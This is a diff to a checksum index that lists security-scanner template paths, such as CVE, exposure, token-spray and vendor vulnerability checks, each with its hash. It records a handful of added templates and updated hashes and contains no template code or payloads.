+http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b
+http/cves/2023/CVE-2023-46574.yaml:6ace2075b83e46ad50e0948d07307e229fc5762a
 http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375
 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8
 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801
@ -4081,7 +4084,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db
 http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5
 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8
 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887
-http/exposures/backups/zip-backup-files.yaml:8cf2dd99ecd30272989353d8e3436c7ebb9db30a
+http/exposures/backups/zip-backup-files.yaml:487c3ae6d577218c258810b2c0ed55fc361cd3fd
 http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240
 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3
 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297
@ -4230,6 +4233,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b7
 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880
 http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de
 http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b
+http/exposures/docker-daemon-exposed.yaml:7058b14b309a1b24bf20748bc1d7672987f061de
 http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017
 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b
 http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90
@ -6621,6 +6625,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7
 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2
 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a
 http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2
+http/token-spray/api-openai.yaml:98b146f8013df819687095a1bc26f045513d373e
 http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151
 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7
 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a
@ -7207,7 +7212,9 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190
 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640
 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f
 http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975
+http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:85cd22dc109529bd4a93f0d18672d93221befc04
 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522
+http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41
 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283
 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9
 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc
@ -7512,6 +7519,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818
 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4
 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83
 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e
+http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:2e2099e6cd39c30a2b7f8096d5e65340142e009b
 http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db
 http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186
 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d
@ -7707,7 +7715,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4
-templates-checksum.txt:1d23d1aacf1e4190c82bd26e8dac8713e6edc398
+templates-checksum.txt:64044c74227162222065c4d5b7a5a7a010925ec7
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4